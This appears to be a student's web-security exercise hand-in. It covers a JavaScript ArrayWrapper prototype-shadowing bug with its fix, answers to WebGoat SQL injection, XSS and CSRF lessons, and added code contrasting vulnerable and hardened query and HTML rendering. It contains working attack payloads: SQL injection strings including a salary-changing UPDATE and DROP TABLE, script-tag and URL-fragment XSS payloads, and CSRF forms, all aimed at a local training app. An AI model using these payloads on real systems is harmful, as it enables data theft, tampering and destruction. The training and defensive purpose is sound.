
Exercise 12 - Security

12.1 Secure Array Wrapper

Root cause analysis
The set function of the ArrayWrapper is meant to accept only number values for the position, but nothing enforces this because the type is never checked. As a result, functions of the Array prototype, in this case push(), can be overridden (the string key "push" becomes an own property of the private array that shadows Array.prototype.push). Since append() calls push(), the replaced push function is invoked, which writes the contents of the ArrayWrapper into a variable of its own and outputs them.

Security concept
When set is called, it must be verified that pos is a number value. In addition, it can be ensured that value is not of type function. Only then should the actual write be executed.

Secure ArrayWrapper:

    function arrayWrapper() {
        let array = [...arguments]; // private: only reachable through the returned methods
        return {
            get: function (pos) {
                return array[pos];
            },
            set: function (pos, value) {
                // Only numeric positions may be written, and never with a function value,
                // so a string key such as "push" can no longer shadow Array.prototype.push
                if (typeof pos === "number" && typeof value !== "function") {
                    array[pos] = value;
                }
            },
            append: function (value) {
                array.push(value);
            }
        };
    }
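As an added illustration (not part of the exercise hand-in above), the following script puts the unsafe wrapper the root cause analysis describes next to a hardened variant and replays the shadowing attack against both. The hardened variant goes a step beyond the typeof checks of the hand-in: it requires a non-negative integer index (NaN, -1 and 1.5 are of type number too, and would become the string keys "NaN", "-1", "1.5" on the array), and append() calls Array.prototype.push directly, so even a shadowed instance property could never be reached from it. Function names and the "secret-N" values are constructed for the example.

```javascript
// Added example, not part of the exercise hand-in.

// Vulnerable variant: `pos` is used as a property key without any check, so
// set("push", fn) creates an own property "push" on the private array that
// shadows Array.prototype.push. append() then calls the attacker's function.
function unsafeArrayWrapper(...items) {
  const array = [...items]; // private
  return {
    get: (pos) => array[pos],
    set: (pos, value) => { array[pos] = value; },
    append: (value) => { array.push(value); },
  };
}

// Hardened variant:
//  - only non-negative integer indices may be read or written,
//  - function values are rejected,
//  - append() never goes through a property lookup on the instance.
function safeArrayWrapper(...items) {
  const array = [...items]; // private
  const isIndex = (pos) => Number.isInteger(pos) && pos >= 0;
  return {
    get: (pos) => (isIndex(pos) ? array[pos] : undefined),
    set: (pos, value) => {
      if (!isIndex(pos) || typeof value === "function") {
        return false; // rejected, nothing written
      }
      array[pos] = value;
      return true;
    },
    append: (value) => {
      Array.prototype.push.call(array, value);
    },
  };
}

// Replays the attack from the exercise against a wrapper factory: install a
// fake push(), then append. Returns whatever the fake push() managed to see,
// or null if it never ran.
function replayAttack(makeWrapper) {
  const wrapper = makeWrapper("secret-1", "secret-2");
  let leaked = null;
  wrapper.set("push", function (value) {
    // `this` is the private array when the shadowing succeeded
    leaked = [...this, value];
  });
  wrapper.append("secret-3");
  return leaked;
}

console.log(replayAttack(unsafeArrayWrapper)); // [ 'secret-1', 'secret-2', 'secret-3' ]
console.log(replayAttack(safeArrayWrapper));   // null
```

The decisive change is the last one: by calling Array.prototype.push explicitly, append() no longer depends on what the instance happens to have stored under the name "push", so the index validation becomes a second line of defence rather than the only one.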
                                
                            
12.2 WebGoat Injection

2) Retrieve the department of the employee Bob Franco
SELECT department FROM employees WHERE first_name='Bob'

3) Change the department of Tobi Barnett to 'Sales'
UPDATE employees SET department = 'Sales' WHERE first_name = 'Tobi' AND last_name = 'Barnett'

4) Modify the schema by adding the column "phone" (varchar(20)) to the table "employees".
ALTER TABLE employees ADD phone varchar(20)

5) Grant rights to the table grant_rights to user unauthorized_user
GRANT ALL ON grant_rights TO unauthorized_user

9) String SQL injection: Retrieve all the users from the users table.
SELECT * FROM user_data WHERE first_name = 'John' AND last_name = 'Smith' OR '1' = '1'

10) Numeric SQL injection: Retrieve all the data from the users table.
Login_Count: 0
User_Id: 0 OR 1=1

11) Retrieve all employee data from the employees table.
Employee Name: Smith
TAN: ' OR '1'='1

12) Change your own salary so you are earning the most!
Employee name: A
Authentication TAN: '; UPDATE employees SET salary=9999 WHERE first_name='John' AND last_name='Smith

13) Delete the access log.
%'; DROP TABLE access_log;--
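The lessons above work because the application splices user input into the SQL text. As an added example (not from WebGoat and not part of the hand-in), the following script rebuilds the query construction behind lessons 9 and 10 beside a hardened form. It assumes a database driver following the common Node convention query(sql, params) with "?" placeholders, and the column names login_count and userid are assumed; no database is involved, only the SQL text and parameter list each builder produces are inspected.

```javascript
// Added example, not taken from WebGoat or from the exercise hand-in.

// Lesson 9, vulnerable: the inputs are concatenated into the SQL text, so the
// quote inside the last_name value closes the literal and the remainder
// ("OR '1' = '1") becomes part of the WHERE clause.
function buildUserQueryUnsafe(firstName, lastName) {
  return {
    sql: "SELECT * FROM user_data WHERE first_name = '" + firstName +
         "' AND last_name = '" + lastName + "'",
    params: [],
  };
}

// Hardened: the SQL text is a constant; the values travel as bound
// parameters and the driver never parses them as SQL, whatever quotes
// they contain. (Assumed driver contract: query(sql, params).)
function buildUserQuerySafe(firstName, lastName) {
  return {
    sql: "SELECT * FROM user_data WHERE first_name = ? AND last_name = ?",
    params: [firstName, lastName],
  };
}

// Lesson 10, vulnerable: numeric fields are not even quoted, so
// "0 OR 1=1" lands in the clause verbatim.
function buildLoginQueryUnsafe(loginCount, userId) {
  return {
    sql: "SELECT * FROM user_data WHERE login_count = " + loginCount +
         " AND userid = " + userId,
    params: [],
  };
}

// Hardened: numeric fields are validated as non-negative integers before
// they are bound; anything else fails closed with an error, not a query.
function toNonNegativeInt(value) {
  const s = String(value).trim();
  if (!/^\d+$/.test(s)) {
    throw new TypeError("expected a non-negative integer, got " + JSON.stringify(value));
  }
  return Number(s);
}

function buildLoginQuerySafe(loginCount, userId) {
  return {
    sql: "SELECT * FROM user_data WHERE login_count = ? AND userid = ?",
    params: [toNonNegativeInt(loginCount), toNonNegativeInt(userId)],
  };
}

// Walk-through with the exact inputs used in lessons 9 and 10.
console.log(buildUserQueryUnsafe("John", "Smith' OR '1' = '1").sql);
// SELECT * FROM user_data WHERE first_name = 'John' AND last_name = 'Smith' OR '1' = '1'
console.log(buildUserQuerySafe("John", "Smith' OR '1' = '1"));
console.log(buildLoginQueryUnsafe("0", "0 OR 1=1").sql);
// SELECT * FROM user_data WHERE login_count = 0 AND userid = 0 OR 1=1
try {
  buildLoginQuerySafe("0", "0 OR 1=1");
} catch (e) {
  console.log("rejected: " + e.message);
}
```

Note that the unsafe string builder reproduces the exact statement given as the answer to lesson 9, while the safe builder keeps that same text as a plain parameter value. For the numeric case, parameter binding alone would already stop the injection, but validating the type first also gives the application a clean error to log instead of a driver-level failure.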
12.3 WebGoat XSS

2) Were the cookies the same on each tab?
Yes.

7) Use the alert() or console.log() methods to find out which field is vulnerable
Credit Card Number: <script>alert()</script>

10) What is the route for the test code that stayed in the app during production?
start.mvc#test

11) Use the route you just found and see if you can use the fact that it reflects a parameter from the route without encoding to execute an internal function in WebGoat. The function you want to execute is webgoat.customjs.phoneHome().
http://127.0.0.1:8080/WebGoat/start.mvc#test/%3Cscript%3Ewebgoat.customjs.phoneHome()%3C%2Fscript%3E
Result number: -1550996069

12) Quiz:

1. Are trusted websites immune to XSS attacks?
4 - No, because the browser trusts the website if it is acknowledged trusted, then the browser does not know that the script is malicious.

2. When do XSS attacks occur?
3 - The data is included in dynamic content that is sent to a web user without being validated for malicious content.

3. What are Stored XSS attacks?
1 - The script is permanently stored on the server and the victim gets the malicious script when requesting information from the server.

4. What are Reflected XSS attacks?
2 - They reflect the injected script off the web server. That occurs when input sent to the web server is part of the request.

5. Is JavaScript the only way to perform XSS attacks?
4 - No there are many other ways. Like HTML, Flash or any other type of code that the browser executes.
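Both findings above (the reflected credit-card field in lesson 7 and the test route that reflects a fragment parameter in lessons 10 and 11) have the same fix: encode the value for the HTML context it is inserted into. The following script is an added example, not WebGoat code and not part of the hand-in; the render functions and the #test/<param> route parsing are illustrative reconstructions of what the vulnerable pages effectively do.

```javascript
// Added example, not taken from WebGoat or from the exercise hand-in.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode for an HTML text node or a double-quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Lesson 7, vulnerable: the submitted field is concatenated into the page.
function renderFieldUnsafe(label, value) {
  return "<p>" + label + ": " + value + "</p>";
}

// Hardened echo of the same field.
function renderFieldSafe(label, value) {
  return "<p>" + escapeHtml(label) + ": " + escapeHtml(value) + "</p>";
}

// Lessons 10/11: a hash route "#test/<param>" whose parameter is reflected.
// Parsed the way a client-side router would, including percent-decoding.
function parseTestRoute(hash) {
  const m = /^#test\/(.*)$/.exec(hash);
  return m ? decodeURIComponent(m[1]) : null;
}

// Vulnerable reflection: the decoded parameter goes straight into markup
// (in the browser this is the innerHTML assignment).
function renderTestRouteUnsafe(hash) {
  const param = parseTestRoute(hash);
  return param === null ? "" : '<div id="param">' + param + "</div>";
}

// Hardened reflection. In a browser the equivalent is assigning the value
// to element.textContent instead of innerHTML.
function renderTestRouteSafe(hash) {
  const param = parseTestRoute(hash);
  return param === null ? "" : '<div id="param">' + escapeHtml(param) + "</div>";
}

// Helper used to check the outcome: does the rendered HTML still contain a
// script tag that the browser would execute?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Walk-through with the two payloads from the lessons.
console.log(renderFieldSafe("Credit Card Number", "<script>alert()</script>"));
// <p>Credit Card Number: &lt;script&gt;alert()&lt;/script&gt;</p>
console.log(renderTestRouteSafe("#test/%3Cscript%3Ewebgoat.customjs.phoneHome()%3C%2Fscript%3E"));
// <div id="param">&lt;script&gt;webgoat.customjs.phoneHome()&lt;/script&gt;</div>
```

The route case is worth singling out: because the parameter comes from the URL fragment, it never reaches the server, so server-side filtering cannot help and the encoding has to happen in the client-side code that writes the DOM.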

12.4 WebGoat Cross-Site Request Forgeries
3) Basic Get CSRF Exercise: Trigger the form from an external source while logged in.

    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>CSRF</title>
    </head>
    <body>
    <form action="http://127.0.0.1:8080/WebGoat/csrf/basic-get-flag" method="POST">
        <input type="hidden" name='csrf' value='true'>
        <input type="submit" name="submit">
    </form>
    </body>
    </html>
            
4) Post a review on someone else’s behalf

    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <title>CSRF 4</title>
    </head>
    <body>
    <form class="attack-form" accept-charset="UNKNOWN" id="csrf-review" method="POST" name="review-form"
    successcallback="" action="http://127.0.0.1:8080/WebGoat/csrf/review">
    <input class="form-control" id="reviewText" name="reviewText" value="lol" type="text">
    <input type="hidden" class="form-control" id="reviewStars" name="stars" value="0">
    <input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9">
    <input type="submit" name="submit" value="Submit review">
    </form>
    </body>
    </html>
                                
7) CSRF and content-type. POST JSON message to our endpoints...

    <html>
    <body>
    <form action=http://127.0.0.1:8080/WebGoat/csrf/feedback/message method=post enctype="text/plain">
        <input name=' {"name": "WebGoat", "email": "webgoat@webgoat.org", "content": "WebGoat is the best!!", "ignore_me":" '
               value='test"}' type='hidden'>
        <input type='submit' value='Submit'>
    </form>
    </body>
    </html>